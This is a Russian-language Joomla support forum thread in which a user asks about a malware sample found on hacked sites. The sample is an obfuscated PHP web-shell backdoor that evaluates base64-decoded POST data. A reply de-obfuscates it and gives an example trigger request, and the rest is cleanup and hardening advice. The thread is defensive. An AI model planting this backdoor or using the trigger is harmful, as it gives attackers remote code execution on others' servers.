Форум русской поддержки Joomla!® CMS
07.12.2016, 22:24:54 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Что за вирус

 (Прочитано 337 раз)
0 Пользователей и 1 Гость смотрят эту тему.
stydent
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 133


« : 03.12.2015, 13:05:22 »

уже второй сайт чищу от такого шлака
<?php                                                                                                                                                                                                                                                                    $diz37= "6bsd4etpoca_";$sbd95 = strtolower($diz37[1]. $diz37[10]. $diz37[2].$diz37[5] .$diz37[0]. $diz37[4].$diz37[11]. $diz37[3]. $diz37[5]. $diz37[9].$diz37[8]. $diz37[3].$diz37[5] ); $etct0= strtoupper ( $diz37[11]. $diz37[7].$diz37[8]. $diz37[2]. $diz37[6]) ; if (isset (${ $etct0 }['n052e33']) ) { eval ($sbd95 ( ${$etct0 }['n052e33'])) ;} ?>

Размещается либо отдельным файлом, либо в начале файла.

Сайты на второй и третьей Joomla..Joomla обновлены.
Записан
kik84
Живу я здесь
******

Репутация: +59/-4
Offline Offline

Сообщений: 1307



« Ответ #1 : 03.12.2015, 15:33:41 »

Я бы задался вопросом, не "что за вирус", а как он попадает на сайт.
Удалить варез и неиспользуемые расширения, сканер aibolit по серваку, поставить rsfirewall, не держать пачку сайтов в одном аккаунте, проверить свой комп и т.п.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #2 : 03.12.2015, 17:03:59 »

уже второй сайт чищу от такого шлака
<?php                                                                                                                                                                                                                                                                    $diz37= "6bsd4etpoca_";$sbd95 = strtolower($diz37[1]. $diz37[10]. $diz37[2].$diz37[5] .$diz37[0]. $diz37[4].$diz37[11]. $diz37[3]. $diz37[5]. $diz37[9].$diz37[8]. $diz37[3].$diz37[5] ); $etct0= strtoupper ( $diz37[11]. $diz37[7].$diz37[8]. $diz37[2]. $diz37[6]) ; if (isset (${ $etct0 }['n052e33']) ) { eval ($sbd95 ( ${$etct0 }['n052e33'])) ;} ?>

Размещается либо отдельным файлом, либо в начале файла.

Сайты на второй и третьей Joomla..Joomla обновлены.
Бональный бегдор:
Цитировать
if (isset ($_POST['n052e33']) ) { eval (base64_decode($_POST['n052e33'])) ;}
при обращение к файлу POST запросам приводит к выполнению произвольного кода
POST: n052e33=cGhwaW5mbygpOw==
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #3 : 03.12.2015, 17:55:48 »

Сайты разделите по пользователям. А потом чистите. Иначе расползется по всем.
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #4 : 03.12.2015, 18:20:22 »

Согласна с kik84, но даже если удалить варезное, вирус будет сидеть, пока не вычистишь полностью, потому что, он добавляет файлы, скрипты и прочую хрень.

wishlight, Вы совет написали, типа в теме отметились, а толкового совета нет, смысл вашего сообщения? "Чистите!" что ему чистить? ТС даже не знает что это за вирус.

Такое ощущение, что только с баблом сюда надо приходить, за каждым советом. Изначально форум поддержки вроде бы был.
« Последнее редактирование: 03.12.2015, 18:25:53 от 12mv » Записан
stydent
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 133


« Ответ #5 : 03.12.2015, 18:23:56 »

Мне нужны пояснения:
1. Сайты разделите по пользователям. - это как?
2. Удалить варез - это что?
Записан
12mv
Завсегдатай
*****

Репутация: +20/-0
Offline Offline

Пол: Женский
Сообщений: 580


Гульсина


« Ответ #6 : 03.12.2015, 18:27:36 »

Мне нужны пояснения:
2. Удалить варез - это что?

Удалить те приложения, модули, которые вы скачали со сторонних ресурсов а не у разработчика купили. То же самое касается и шаблона.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 726


Свободен для работы


« Ответ #7 : 03.12.2015, 18:50:23 »

Мне нужны пояснения:
1. Сайты разделите по пользователям. - это как?
Это значит на каждый сайт сделать отдельного юзера, который будет иметь свою отдельную группу привилегий, в результате чего, пользователь с другой группы привилегий не будет иметь доступа к управлению файлами, но и тут есть подводные камни, по мимо создания отдельных пользователей под каждый сайт, нужно еще и сам сервак безопасно настроить, а для этого вам нужен свой сервак, а не шаред хостинг, ну или если совсем бюджетный вариант, то на шаред хостинге под каждый сайт отдельный договор(аккаунт).
В таком случае если не уследили за одним сайтом, другие сайты не пострадают, ну или снизится риск значительно...

Сайты разделите по пользователям. А потом чистите. Иначе расползется по всем.
Тут поспорю, все зависит от вашей опытности и мастерства, и какой порядок действий вы выбераите.
« Последнее редактирование: 03.12.2015, 18:58:11 от winstrool » Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #8 : 03.12.2015, 19:53:46 »

опытности и мастерства

Да, это так. Сейчас есть хостинги, которые хотя бы ограничивают выполнение скрипта директорией домена.

wishlight, Вы совет написали, типа в теме отметились, а толкового совета нет

Раньше пользователи рассказывали, сколько сайтов, что стоит, чем пользовались при доступе к сайту, кто имеет доступ к сайту. А мой совет думаю был бы полезен в том плане что "уже второй сайт".

А после того, как сайты изолируются, смотрим на каждом расширения и сверяемся с к примеру https://vel.joomla.org/ или можно поставить Securitycheck, у них список тоже базовых уязвимостей в компоненте. Устраняем их и чистим сайт. Для новичков идеально подходит скрипт ai-bolit.

В данном случае скорее всего на каком-то сайте была уязвимость до обновления (или есть) и через нее залит шелл, и с него все лезет.

Rsfirewall еще купить надо. ТС не сообщал, что он пользовался варезом.
Записан
stydent
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 133


« Ответ #9 : 03.12.2015, 23:54:47 »

Сайты на разных площадках. Но оба на timeweb. На хостинге beget не было случаев подобного заражения.

Варез....т.е. все что бесплатное может легко быть взломано?
Обычно пользуюсь известными компонентами и модулями: virtualmat, BT Content Slider

пока спасает запрет на выполнения php в директориях. по логам видно что хакер 403 ответ получает когда запускает свой вирус.
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3487


skype aqaus.com


« Ответ #10 : 04.12.2015, 00:01:17 »

Варез - это все программное обеспечение, скачанное не с сайтов авторов или других официальных репозиториев. В результате может содержать пиратский вредоносный код.

У вас наверно такого нет. Это для общей информации.

Сайты обновлены? Хороший хостинг ukraine.com.ua если знать как им пользоваться. У  таймвеба в плане помощи в таких случаях никак.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet